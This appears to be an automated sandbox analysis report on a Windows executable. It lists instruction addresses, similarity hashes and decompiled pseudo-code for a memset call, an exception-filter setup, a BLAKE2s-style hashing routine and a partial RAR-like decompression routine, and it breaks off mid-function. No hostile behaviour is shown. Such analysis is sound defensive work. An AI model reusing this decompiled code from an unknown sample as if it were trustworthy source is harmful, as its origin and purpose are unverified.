0x00413b33
0x00413b33
0x00413b36
0x00413b36
0x00413b3e
0x00413b4b
0x00413b50
0x00413b50
0x00413b50
0x00413b54
0x00413b5a
0x00413b5c
0x00413b6d
0x00413b6f
0x00413b74
0x00413b7a
0x00413b7f
0x00413b83
0x00413bae
0x00413baf
0x00413bb6
0x00413bb9
0x00413bd1
0x00413bd4
0x00413bde
0x00413be0
0x00413be6
0x00413bec
0x00413bf1
0x00413bf5
0x00413bf7
0x00413bf9
0x00413bf9
0x00413bf9
0x00413bfb
0x00413c03
0x00413c03
0x00413c06
0x00413c27
0x00413c2a
0x00413c2c
0x00413c88
0x00413ca1
0x00413ca1
0x00413ca4
0x00413c8a
0x00413c92
0x00413c95
0x00413c95
0x00413ca8
0x00413cab
0x00413ccc
0x00413ccc
0x00413cd0
0x00000000
0x00000000
0x00413cb2
0x00413cb5
0x00413cbc
0x00000000
0x00000000
0x00413cc1
0x00413cc1
0x00413cc1
0x00413cc4
0x00413cc4
0x00000000
0x00413ccc
0x00413c2e
0x00413c31
0x00413c4a
0x00413c4a
0x00413c4d
0x00413c33
0x00413c3b
0x00413c3e
0x00413c3e
0x00413c51
0x00413c54
0x00413c59
0x00413c5d
0x00413c80
0x00413c80
0x00413c84
0x00000000
0x00000000
0x00413c61
0x00413c64
0x00413c67
0x00413c6c
0x00000000
0x00000000
0x00413c75
0x00413c7c
0x00413c7c
0x00413c7d
0x00413c7d
0x00413c86
0x00000000
0x00413c5d
0x00413c08
0x00413c14
0x00413c17
0x00413c1f
0x00000000
0x00413c1f
0x00413bbb
0x00413bbf
0x00413bbf
0x00413bc1
0x00000000
0x00000000
0x00413bc3
0x00413bc4
0x00413bc7
0x00413bca
0x00000000
0x00000000
0x00000000
0x00413bcc
0x00413bce
0x00000000
0x00413bce
0x00413b87
0x00413b8a
0x00413b94
0x00413b99
0x00413b9c
0x00413ba1
0x00413ba4
0x00000000
0x00413ba4
0x00413b60
0x00413b65
0x00413b67
0x00413ced
0x00413ced
0x00413d67
0x00000000
0x00413d67
0x00000000
0x00413cd2
0x00413cd2
0x00413cd2
0x00413cdf
0x00413ce1
0x00413ce4
0x00413ceb
0x00413d06
0x00413d1d
0x00413d31
0x00413d45
0x00413d56
0x00413d56
0x00413d5d
0x00413d65
0x00000000
0x00413d65
0x00000000
0x00413ceb
0x00413a77
0x00000000
0x00413a81
0x00413a3e
0x00413a45
0x00000000
0x00000000
0x00413d6b

APIs

_memset.LIBCMT ref: 00413AB4

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 773665c35bfea70881cc1d81f7bd551d3ef6853e026b55f0abc0521eea804638
Instruction ID: 08d5bf96afac4b694966fac7c2312e330e740f7a0212adf6441fdc190f0de3b1
Opcode Fuzzy Hash: 773665c35bfea70881cc1d81f7bd551d3ef6853e026b55f0abc0521eea804638
Instruction Fuzzy Hash: F1A12572604208EBDF05DF69C981BED77A5AB40305F20446FE845EB283E73CAB85DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00422FA5, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422FA5() {

				SetUnhandledExceptionFilter(E00422F63);
				return 0;
			}

0x00422faa
0x00422fb2

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00022F63), ref: 00422FAA

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3c4bfe33f02d56cc2e435ced761c6724273f173c92d43021ca21d2d902e1889b
Instruction ID: 7a3bad809c652208e8c12cc745906a8d04a4cbd6f1aa469a6ac54f472ee40765
Opcode Fuzzy Hash: 3c4bfe33f02d56cc2e435ced761c6724273f173c92d43021ca21d2d902e1889b
Instruction Fuzzy Hash: 849002A07511116FA61017706E4952535A09B5CA32BD205616421C8055DA944162A65A

Uniqueness

Uniqueness Score: -1.00%

Function 00404926, Relevance: 1.5, Strings: 1, Instructions: 245
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00404926(void* __eax, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void _v68;
				void _v132;
				void* _t219;
				signed int* _t220;
				void* _t223;
				signed int* _t226;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t233;
				signed int _t238;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t244;
				intOrPtr _t245;
				signed int _t252;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t270;
				signed int _t275;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				signed int _t285;
				signed int _t289;
				signed int _t290;
				signed int _t293;
				signed int _t294;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				signed int _t315;
				signed int _t316;
				signed int _t341;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				void* _t364;

				_t245 = _a4;
				_t233 = 0x10;
				memcpy( &_v132, __eax, _t233 << 2);
				_push(8);
				_t219 = memcpy( &_v68,  *(_t245 + 0xf4), 0 << 2);
				_t220 =  *(_t245 + 0xfc);
				_t238 =  *_t219 ^ 0x510e527f;
				_t341 =  *(_t219 + 4) ^ 0x9b05688c;
				_v8 = _t220[1] ^ 0x5be0cd19;
				_v36 = 0x6a09e667;
				_v32 = 0xbb67ae85;
				_v28 = 0x3c6ef372;
				_v24 = 0xa54ff53a;
				_v12 =  *_t220 ^ 0x1f83d9ab;
				_t223 = 0;
				while(1) {
					_t18 = _t223 + 0x42a498; // 0x3020100
					_t229 = _v68 +  *((intOrPtr*)(_t364 + ( *_t18 & 0x000000ff) * 4 - 0x80)) + _v52;
					_t24 = _t223 + 0x42a499; // 0x4030201
					_t252 = _t229 ^ _t238;
					asm("ror edx, 0x10");
					_v36 = _v36 + _t252;
					_t240 = _v52 ^ _v36;
					asm("ror ecx, 0xc");
					_t230 = _t229 +  *((intOrPtr*)(_t364 + ( *_t24 & 0x000000ff) * 4 - 0x80)) + _t240;
					_v68 = _t230;
					_t231 = _t230 ^ _t252;
					_t33 = _t223 + 0x42a49a; // 0x5040302
					asm("ror ebx, 0x8");
					_v64 = _v64 +  *((intOrPtr*)(_t364 + ( *_t33 & 0x000000ff) * 4 - 0x80)) + _v48;
					_v36 = _v36 + _t231;
					_t241 = _t240 ^ _v36;
					_t257 = _v64 ^ _t341;
					_t44 = _t223 + 0x42a49b; // 0x6050403
					asm("ror ecx, 0x7");
					asm("ror edx, 0x10");
					_v32 = _v32 + _t257;
					_v16 = _t257;
					_t259 = _v48 ^ _v32;
					_t315 = _v40;
					asm("ror edx, 0xc");
					_v64 = _v64 +  *((intOrPtr*)(_t364 + ( *_t44 & 0x000000ff) * 4 - 0x80)) + _t259;
					_t346 = _v64 ^ _v16;
					asm("ror esi, 0x8");
					_v32 = _v32 + _t346;
					_v16 = _t346;
					_t347 = _v44;
					asm("ror edx, 0x7");
					_v48 = _t259 ^ _v32;
					_t64 = _t223 + 0x42a49c; // 0x7060504
					_v60 = _v60 +  *((intOrPtr*)(_t364 + ( *_t64 & 0x000000ff) * 4 - 0x80)) + _t347;
					_t265 = _v60 ^ _v12;
					asm("ror edx, 0x10");
					_v28 = _v28 + _t265;
					_t348 = _t347 ^ _v28;
					_v12 = _t265;
					_t76 = _t223 + 0x42a49d; // 0x8070605
					asm("ror esi, 0xc");
					_v60 = _v60 +  *((intOrPtr*)(_t364 + ( *_t76 & 0x000000ff) * 4 - 0x80)) + _t348;
					_t270 = _v60 ^ _v12;
					asm("ror edx, 0x8");
					_v28 = _v28 + _t270;
					_v12 = _t270;
					_t88 = _t223 + 0x42a49e; // 0x9080706
					_v56 = _v56 +  *((intOrPtr*)(_t364 + ( *_t88 & 0x000000ff) * 4 - 0x80)) + _t315;
					_t275 = _v56 ^ _v8;
					asm("ror esi, 0x7");
					asm("ror edx, 0x10");
					_v24 = _v24 + _t275;
					_t316 = _t315 ^ _v24;
					_v44 = _t348 ^ _v28;
					_v8 = _t275;
					_t101 = _t223 + 0x42a49f; // 0xa090807
					asm("ror edi, 0xc");
					_v56 = _v56 +  *((intOrPtr*)(_t364 + ( *_t101 & 0x000000ff) * 4 - 0x80)) + _t316;
					_t280 = _v56 ^ _v8;
					asm("ror edx, 0x8");
					_v24 = _v24 + _t280;
					_v8 = _t280;
					_t113 = _t223 + 0x42a4a0; // 0xb0a0908
					_t282 = _v48;
					_v68 = _v68 +  *((intOrPtr*)(_t364 + ( *_t113 & 0x000000ff) * 4 - 0x80)) + _t282;
					_t353 = _v68 ^ _v8;
					asm("ror edi, 0x7");
					asm("ror esi, 0x10");
					_v28 = _v28 + _t353;
					_t283 = _t282 ^ _v28;
					_v40 = _t316 ^ _v24;
					_t126 = _t223 + 0x42a4a1; // 0xc0b0a09
					asm("ror edx, 0xc");
					_v68 = _v68 +  *((intOrPtr*)(_t364 + ( *_t126 & 0x000000ff) * 4 - 0x80)) + _t283;
					_v48 = _t283;
					_t285 = _v68 ^ _t353;
					asm("ror edx, 0x8");
					_v28 = _v28 + _t285;
					_v8 = _t285;
					_t139 = _t223 + 0x42a4a3; // 0xe0d0c0b
					asm("ror edx, 0x7");
					_v48 = _v48 ^ _v28;
					_t144 = _t223 + 0x42a4a2; // 0xd0c0b0a
					_t289 = _v44;
					_v64 = _v64 +  *((intOrPtr*)(_t364 + ( *_t144 & 0x000000ff) * 4 - 0x80)) + _t289;
					_t357 = _v64 ^ _t231;
					asm("ror esi, 0x10");
					_v24 = _v24 + _t357;
					_t290 = _t289 ^ _v24;
					asm("ror edx, 0xc");
					_v64 = _v64 +  *((intOrPtr*)(_t364 + ( *_t139 & 0x000000ff) * 4 - 0x80)) + _t290;
					asm("ror edi, 0x8");
					_t358 = _v64 ^ _t357;
					_v24 = _v24 + _t358;
					_t161 = _t223 + 0x42a4a5; // 0xe0f0e0d
					asm("ror edx, 0x7");
					_v44 = _t290 ^ _v24;
					_t166 = _t223 + 0x42a4a4; // 0xf0e0d0c
					_v20 = _t358;
					_t293 = _v40;
					_v60 = _v60 +  *((intOrPtr*)(_t364 + ( *_t166 & 0x000000ff) * 4 - 0x80)) + _t293;
					_t362 = _v60 ^ _v16;
					asm("ror esi, 0x10");
					_v36 = _v36 + _t362;
					_t294 = _t293 ^ _v36;
					asm("ror edx, 0xc");
					_v60 = _v60 +  *((intOrPtr*)(_t364 + ( *_t161 & 0x000000ff) * 4 - 0x80)) + _t294;
					asm("ror edi, 0x8");
					_t341 = _v60 ^ _t362;
					_v36 = _v36 + _t341;
					_t185 = _t223 + 0x42a4a7; // 0x40a0e0f
					asm("ror edx, 0x7");
					_v40 = _t294 ^ _v36;
					_t190 = _t223 + 0x42a4a6; // 0xa0e0f0e
					_v56 = _v56 +  *((intOrPtr*)(_t364 + ( *_t190 & 0x000000ff) * 4 - 0x80)) + _t241;
					_t300 = _v56 ^ _v12;
					_t223 = _t223 + 0x10;
					asm("ror edx, 0x10");
					_v32 = _v32 + _t300;
					_t242 = _t241 ^ _v32;
					_v16 = _t341;
					asm("ror ecx, 0xc");
					_v56 = _v56 +  *((intOrPtr*)(_t364 + ( *_t185 & 0x000000ff) * 4 - 0x80)) + _t242;
					asm("ror edi, 0x8");
					_t301 = _v56 ^ _t300;
					_v32 = _v32 + _t301;
					_v12 = _t301;
					asm("ror ecx, 0x7");
					_v52 = _t242 ^ _v32;
					if(_t223 > 0x90) {
						break;
					}
					_t238 = _v20;
				}
				_t244 = 0;
				do {
					_t226 =  *((intOrPtr*)(_a4 + 0xf4)) + _t244;
					_t303 =  *(_t364 + _t244 - 0x20) ^  *_t226;
					_t244 = _t244 + 4;
					 *_t226 = _t303 ^  *(_t364 + _t244 - 0x44);
				} while (_t244 < 0x20);
				return _t226;
			}

0x0040492f
0x0040493f
0x00404943
0x0040494b
0x00404951
0x00404958
0x0040496e
0x00404974
0x0040497a
0x0040497d
0x00404984
0x0040498b
0x00404992
0x00404999
0x0040499c
0x004049a3
0x004049a3
0x004049b4
0x004049b6
0x004049c3
0x004049c5
0x004049c8
0x004049ce
0x004049d1
0x004049d6
0x004049d8
0x004049db
0x004049dd
0x004049eb
0x004049ee
0x004049f1
0x004049f4
0x004049fa
0x004049fc
0x00404a07
0x00404a0a
0x00404a0d
0x00404a10
0x00404a16
0x00404a19
0x00404a1c
0x00404a21
0x00404a27
0x00404a2a
0x00404a2d
0x00404a33
0x00404a36
0x00404a39
0x00404a3c
0x00404a3f
0x00404a4c
0x00404a52
0x00404a55
0x00404a58
0x00404a5b
0x00404a5e
0x00404a61
0x00404a6c
0x00404a71
0x00404a77
0x00404a7a
0x00404a7d
0x00404a83
0x00404a86
0x00404a93
0x00404a99
0x00404a9c
0x00404a9f
0x00404aa2
0x00404aa5
0x00404aa8
0x00404aab
0x00404aae
0x00404ab9
0x00404abe
0x00404ac4
0x00404ac7
0x00404aca
0x00404ad0
0x00404ad3
0x00404ade
0x00404ae3
0x00404ae9
0x00404aec
0x00404aef
0x00404af2
0x00404af5
0x00404af8
0x00404afb
0x00404b06
0x00404b0b
0x00404b0e
0x00404b14
0x00404b16
0x00404b19
0x00404b1c
0x00404b25
0x00404b30
0x00404b33
0x00404b36
0x00404b41
0x00404b46
0x00404b4c
0x00404b4e
0x00404b51
0x00404b54
0x00404b57
0x00404b5c
0x00404b64
0x00404b67
0x00404b69
0x00404b6f
0x00404b7a
0x00404b7d
0x00404b80
0x00404b87
0x00404b8e
0x00404b93
0x00404b99
0x00404b9c
0x00404b9f
0x00404ba2
0x00404ba5
0x00404baa
0x00404bb2
0x00404bb5
0x00404bb7
0x00404bbd
0x00404bc8
0x00404bcb
0x00404bce
0x00404bdb
0x00404be1
0x00404be4
0x00404be7
0x00404bea
0x00404bed
0x00404bf0
0x00404bf3
0x00404bf8
0x00404c00
0x00404c03
0x00404c05
0x00404c0b
0x00404c0e
0x00404c11
0x00404c19
0x00000000
0x00000000
0x004049a0
0x004049a0
0x00404c21
0x00404c24
0x00404c31
0x00404c33
0x00404c35
0x00404c3c
0x00404c3e
0x00404c44

Strings

gj, xrefs: 0040497D

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 98a342e391febb5e68c784be1269dc507bb6ad2cd511adc92369ac6dfd216b48
Instruction ID: 14b43f9a4f3eba7009e8543e8e46662733bf8c20ad98ee2769b6a61914914b2c
Opcode Fuzzy Hash: 98a342e391febb5e68c784be1269dc507bb6ad2cd511adc92369ac6dfd216b48
Instruction Fuzzy Hash: C2C126B2D002299BDF44CF9AD8405DEFBB2BFC8324F2AC1A6D81437615D6346A528F95

Uniqueness

Uniqueness Score: -1.00%

Function 00416767, Relevance: .8, Instructions: 835
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E00416767(void* __ecx, unsigned int _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t398;
				signed int _t399;
				unsigned int _t400;
				signed int _t403;
				intOrPtr* _t405;
				signed int _t407;
				unsigned int _t408;
				signed int _t411;
				signed int _t412;
				signed int* _t420;
				intOrPtr _t421;
				unsigned int _t423;
				unsigned int _t432;
				unsigned int _t434;
				signed int _t435;
				unsigned int _t438;
				signed int _t441;
				signed int _t442;
				signed int _t444;
				signed int _t445;
				signed int* _t446;
				char* _t447;
				unsigned int _t449;
				unsigned int _t451;
				signed int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t464;
				unsigned int _t465;
				signed int _t468;
				signed int _t469;
				signed int* _t477;
				unsigned int _t479;
				unsigned int _t482;
				signed int _t483;
				unsigned int _t486;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				unsigned int _t492;
				signed int _t495;
				signed int _t496;
				signed int _t497;
				unsigned int _t498;
				signed int _t505;
				unsigned int _t506;
				signed int _t509;
				signed int _t510;
				signed int _t515;
				intOrPtr _t517;
				void* _t521;
				signed int _t522;
				void* _t526;
				signed int _t527;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t537;
				void* _t539;
				intOrPtr* _t540;
				signed int _t541;
				intOrPtr* _t543;
				intOrPtr* _t544;
				void* _t547;
				signed int _t548;
				intOrPtr* _t551;
				signed int _t554;
				signed int _t555;
				signed int _t558;
				unsigned int _t559;
				void* _t561;
				signed int _t562;
				signed int _t565;
				intOrPtr* _t568;
				signed int _t569;
				signed int _t570;
				intOrPtr* _t571;
				signed int _t574;
				signed int _t576;
				unsigned int _t578;
				void* _t580;
				signed int _t583;
				signed int _t585;
				unsigned int _t587;
				void* _t589;
				signed int _t593;
				char* _t604;
				signed int _t605;
				void* _t608;
				void* _t612;
				signed int _t615;
				signed int _t618;
				unsigned int _t624;
				signed int _t625;
				unsigned int _t627;
				signed int _t633;
				unsigned int _t635;
				void* _t637;
				signed int _t640;
				signed int _t642;
				unsigned int _t648;
				signed int _t649;
				void* _t651;
				signed int _t656;
				unsigned int _t658;
				void* _t660;
				void* _t662;
				signed int _t665;
				void* _t668;
				void* _t670;
				signed int _t673;
				void* _t676;
				void* _t683;
				signed int _t686;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t713;
				signed int _t733;
				signed int _t736;
				signed int _t750;
				intOrPtr* _t753;
				intOrPtr* _t758;
				void* _t760;
				void* _t761;
				void* _t767;

				_t760 = __ecx;
				 *((char*)(__ecx + 0x4c58)) = 1;
				if( *((char*)(__ecx + 0x4c48)) != 0) {
					L4:
					_t758 = _t760 + 4;
					while(1) {
						 *(_t760 + 0x70) =  *(_t760 + 0x70) &  *(_t760 + 0xe6f8);
						if( *_t758 <  *((intOrPtr*)(_t760 + 0x7c))) {
							goto L15;
						} else {
							_t540 = _t760 + 0x80;
						}
						while(1) {
							L7:
							_t767 =  *_t758 -  *_t540 +  *((intOrPtr*)(_t760 + 0x88)) - 1;
							if(_t767 <= 0 && (_t767 != 0 ||  *((intOrPtr*)(_t760 + 8)) <  *((intOrPtr*)(_t760 + 0x84)))) {
								break;
							}
							if( *((char*)(_t760 + 0x90)) != 0) {
								L104:
								return E00414E8A(_t760);
							}
							_push(_t540);
							_push(_t758);
							_t517 = E00414050(_t540, _t760);
							if(_t517 == 0) {
								L105:
								return _t517;
							} else {
								_t521 = E0041416C(_t540, _t760, _t758, _t540, _t760 + 0x94);
								if(_t521 != 0) {
									continue;
								} else {
									return _t521;
								}
							}
						}
						_t522 = E00411F1D(_t540, _t760);
						__eflags = _t522;
						if(_t522 == 0) {
							goto L104;
						}
						L15:
						_t398 =  *((intOrPtr*)(_t760 + 0x4b30));
						_t574 =  *(_t760 + 0x70);
						__eflags = (_t398 - _t574 &  *(_t760 + 0xe6f8)) - 0x1004;
						if((_t398 - _t574 &  *(_t760 + 0xe6f8)) >= 0x1004) {
							L21:
							_t399 = E004094F9(_t758);
							_t527 =  *(_t760 + 0x118);
							_t400 = _t399 & 0x0000fffe;
							__eflags = _t400 -  *((intOrPtr*)(_t760 + 0x98 + _t527 * 4));
							if(_t400 >=  *((intOrPtr*)(_t760 + 0x98 + _t527 * 4))) {
								_t695 = 0xf;
								_t576 = _t527 + 1;
								__eflags = _t576 - _t695;
								if(_t576 >= _t695) {
									L29:
									_t578 =  *(_t758 + 4) + _t695;
									 *(_t758 + 4) = _t578 & 0x00000007;
									 *_t758 =  *_t758 + (_t578 >> 3);
									_t580 = 0x10;
									_t403 = (_t400 -  *((intOrPtr*)(_t760 + 0x94 + _t695 * 4)) >> _t580 - _t695) +  *((intOrPtr*)(_t760 + 0xd8 + _t695 * 4));
									__eflags = _t403 -  *((intOrPtr*)(_t760 + 0x94));
									if(_t403 >=  *((intOrPtr*)(_t760 + 0x94))) {
										_t403 = 0;
										__eflags = 0;
									}
									_t530 =  *(_t760 + 0xd1c + _t403 * 2) & 0x0000ffff;
									goto L32;
								} else {
									_t571 = _t760 + 0x98 + _t576 * 4;
									while(1) {
										__eflags = _t400 -  *_t571;
										if(_t400 <  *_t571) {
											_t695 = _t576;
											goto L29;
										}
										_t576 = _t576 + 1;
										_t571 = _t571 + 4;
										__eflags = _t576 - 0xf;
										if(_t576 < 0xf) {
											continue;
										} else {
											goto L29;
										}
									}
									goto L29;
								}
							} else {
								_t683 = 0x10;
								_t515 = _t400 >> _t683 - _t527;
								_t686 = ( *(_t515 + _t760 + 0x11c) & 0x000000ff) +  *(_t758 + 4);
								 *_t758 =  *_t758 + (_t686 >> 3);
								 *(_t758 + 4) = _t686 & 0x00000007;
								_t530 =  *(_t760 + 0x51c + _t515 * 2) & 0x0000ffff;
								L32:
								__eflags = _t530 - 0x100;
								if(_t530 >= 0x100) {
									__eflags = _t530 - 0x106;
									if(_t530 < 0x106) {
										__eflags = _t530 - 0x100;
										if(_t530 != 0x100) {
											__eflags = _t530 - 0x101;
											if(_t530 != 0x101) {
												_t531 = _t530 + 0xfffffefe;
												__eflags = _t531;
												_t405 = _t760 + 0x54 + _t531 * 4;
												_v16 =  *_t405;
												_t583 = _t531;
												if(_t531 == 0) {
													L127:
													 *((intOrPtr*)(_t760 + 0x54)) = _v16;
													_t407 = E004094F9(_t758);
													_t532 =  *(_t760 + 0x2ddc);
													_t408 = _t407 & 0x0000fffe;
													__eflags = _t408 -  *((intOrPtr*)(_t760 + 0x2d5c + _t532 * 4));
													if(_t408 >=  *((intOrPtr*)(_t760 + 0x2d5c + _t532 * 4))) {
														_t696 = 0xf;
														_t585 = _t532 + 1;
														__eflags = _t585 - _t696;
														if(_t585 >= _t696) {
															L135:
															_t587 =  *(_t758 + 4) + _t696;
															 *(_t758 + 4) = _t587 & 0x00000007;
															 *_t758 =  *_t758 + (_t587 >> 3);
															_t589 = 0x10;
															_t411 = (_t408 -  *((intOrPtr*)(_t760 + 0x2d58 + _t696 * 4)) >> _t589 - _t696) +  *((intOrPtr*)(_t760 + 0x2d9c + _t696 * 4));
															__eflags = _t411 -  *((intOrPtr*)(_t760 + 0x2d58));
															if(_t411 >=  *((intOrPtr*)(_t760 + 0x2d58))) {
																_t411 = 0;
																__eflags = 0;
															}
															_t412 =  *(_t760 + 0x39e0 + _t411 * 2) & 0x0000ffff;
															L138:
															__eflags = _t412 - 8;
															if(_t412 >= 8) {
																_t537 = (_t412 >> 2) - 1;
																_v12 = ((_t412 & 0x00000003 | 0x00000004) << _t537) + 2;
																__eflags = _t537;
																if(_t537 > 0) {
																	_t438 = E004094F9(_t758);
																	_t608 = 0x10;
																	_v12 = _v12 + (_t438 >> _t608 - _t537);
																	_t441 =  *(_t758 + 4) + _t537;
																	 *_t758 =  *_t758 + (_t441 >> 3);
																	_t442 = _t441 & 0x00000007;
																	__eflags = _t442;
																	 *(_t758 + 4) = _t442;
																}
															} else {
																_v12 = _t412 + 2;
															}
															__eflags =  *((char*)(_t760 + 0x4c38));
															 *(_t760 + 0x68) = _v12;
															if( *((char*)(_t760 + 0x4c38)) == 0) {
																_a4 = _v12;
																_t420 = _t760 + 0x70;
																_t697 =  *_t420;
																_t593 = _t697 - _v16;
																_t539 =  *((intOrPtr*)(_t760 + 0xe6f4)) + 0xffffefff;
																_v8 = _t593;
																__eflags = _t593 - _t539;
																if(_t593 >= _t539) {
																	goto L162;
																}
																__eflags = _t697 - _t539;
																if(_t697 >= _t539) {
																	goto L162;
																}
																_t421 =  *((intOrPtr*)(_t760 + 0x4b34));
																_t543 = _t421 + _t593;
																_v8 = _t421 + _t697;
																_t423 = _v12;
																 *(_t760 + 0x70) = _t423 + _t697;
																__eflags = _v16 - _t423;
																if(_v16 >= _t423) {
																	__eflags = _t423 - 8;
																	if(_t423 < 8) {
																		L154:
																		__eflags = _a4;
																		if(_a4 > 0) {
																			__eflags = _a4 - 1;
																			_t604 = _v8;
																			 *_t604 =  *_t543;
																			if(_a4 > 1) {
																				__eflags = _a4 - 2;
																				 *((char*)(_t604 + 1)) =  *((intOrPtr*)(_t543 + 1));
																				if(_a4 > 2) {
																					__eflags = _a4 - 3;
																					 *((char*)(_t604 + 2)) =  *((intOrPtr*)(_t543 + 2));
																					if(_a4 > 3) {
																						__eflags = _a4 - 4;
																						 *((char*)(_t604 + 3)) =  *((intOrPtr*)(_t543 + 3));
																						if(_a4 > 4) {
																							__eflags = _a4 - 5;
																							 *((char*)(_t604 + 4)) =  *((intOrPtr*)(_t543 + 4));
																							if(_a4 > 5) {
																								__eflags = _a4 - 6;
																								 *((char*)(_t604 + 5)) =  *((intOrPtr*)(_t543 + 5));
																								if(_a4 > 6) {
																									 *((char*)(_t604 + 6)) =  *((intOrPtr*)(_t543 + 6));
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																		continue;
																	}
																	_t432 = _v12 >> 3;
																	__eflags = _t432;
																	_v16 = _t432;
																	do {
																		E0041BB80(_t543, _t758, _t760, _v8, _t543, 8);
																		_v8 = _v8 + 8;
																		_a4 = _a4 - 8;
																		_t761 = _t761 + 0xc;
																		_t543 = _t543 + 8;
																		_t362 =  &_v16;
																		 *_t362 = _v16 - 1;
																		__eflags =  *_t362;
																	} while ( *_t362 != 0);
																	goto L154;
																}
																__eflags = _t423 - 8;
																if(_t423 < 8) {
																	goto L154;
																}
																_t434 = _t423 >> 3;
																__eflags = _t434;
																_t605 = _t434;
																_t435 = _v8;
																do {
																	_a4 = _a4 - 8;
																	 *_t435 =  *_t543;
																	 *((char*)(_t435 + 1)) =  *((intOrPtr*)(_t543 + 1));
																	 *((char*)(_t435 + 2)) =  *((intOrPtr*)(_t543 + 2));
																	 *((char*)(_t435 + 3)) =  *((intOrPtr*)(_t543 + 3));
																	 *((char*)(_t435 + 4)) =  *((intOrPtr*)(_t543 + 4));
																	 *((char*)(_t435 + 5)) =  *((intOrPtr*)(_t543 + 5));
																	 *((char*)(_t435 + 6)) =  *((intOrPtr*)(_t543 + 6));
																	 *((char*)(_t435 + 7)) =  *((intOrPtr*)(_t543 + 7));
																	_t543 = _t543 + 8;
																	_t435 = _t435 + 8;
																	_t605 = _t605 - 1;
																	__eflags = _t605;
																} while (_t605 != 0);
																_v8 = _t435;
																goto L154;
															} else {
																_push( *(_t760 + 0xe6f8));
																_push(_t760 + 0x70);
																_push(_v16);
																_push(_v12);
																goto L77;
															}
														}
														_t544 = _t760 + 0x2d5c + _t585 * 4;
														while(1) {
															__eflags = _t408 -  *_t544;
															if(_t408 <  *_t544) {
																break;
															}
															_t585 = _t585 + 1;
															_t544 = _t544 + 4;
															__eflags = _t585 - 0xf;
															if(_t585 < 0xf) {
																continue;
															}
															goto L135;
														}
														_t696 = _t585;
														goto L135;
													}
													_t612 = 0x10;
													_t444 = _t408 >> _t612 - _t532;
													_t615 = ( *(_t444 + _t760 + 0x2de0) & 0x000000ff) +  *(_t758 + 4);
													 *_t758 =  *_t758 + (_t615 >> 3);
													 *(_t758 + 4) = _t615 & 0x00000007;
													_t412 =  *(_t760 + 0x31e0 + _t444 * 2) & 0x0000ffff;
													goto L138;
												} else {
													goto L126;
												}
												do {
													L126:
													 *_t405 =  *((intOrPtr*)(_t405 - 4));
													_t583 = _t583 - 1;
													_t405 = _t405 - 4;
													__eflags = _t583;
												} while (_t583 > 0);
												goto L127;
											}
											goto L107;
										}
										_push( &_v32);
										_t453 = E00413DD1(_t760, _t758);
										__eflags = _t453;
										if(_t453 == 0) {
											goto L104;
										}
										goto L103;
									} else {
										_t457 = _t530 - 0x106;
										__eflags = _t457 - 8;
										if(_t457 >= 8) {
											_t554 = (_t457 >> 2) - 1;
											_v16 = ((_t457 & 0x00000003 | 0x00000004) << _t554) + 2;
											__eflags = _t554;
											if(_t554 > 0) {
												_t506 = E004094F9(_t758);
												_t676 = 0x10;
												_v16 = _v16 + (_t506 >> _t676 - _t554);
												_t509 =  *(_t758 + 4) + _t554;
												 *_t758 =  *_t758 + (_t509 >> 3);
												_t510 = _t509 & 0x00000007;
												__eflags = _t510;
												 *(_t758 + 4) = _t510;
											}
										} else {
											_v16 = _t457 + 2;
										}
										_a4 = _v16;
										_t464 = E004094F9(_t758);
										_t733 =  *(_t760 + 0x1004);
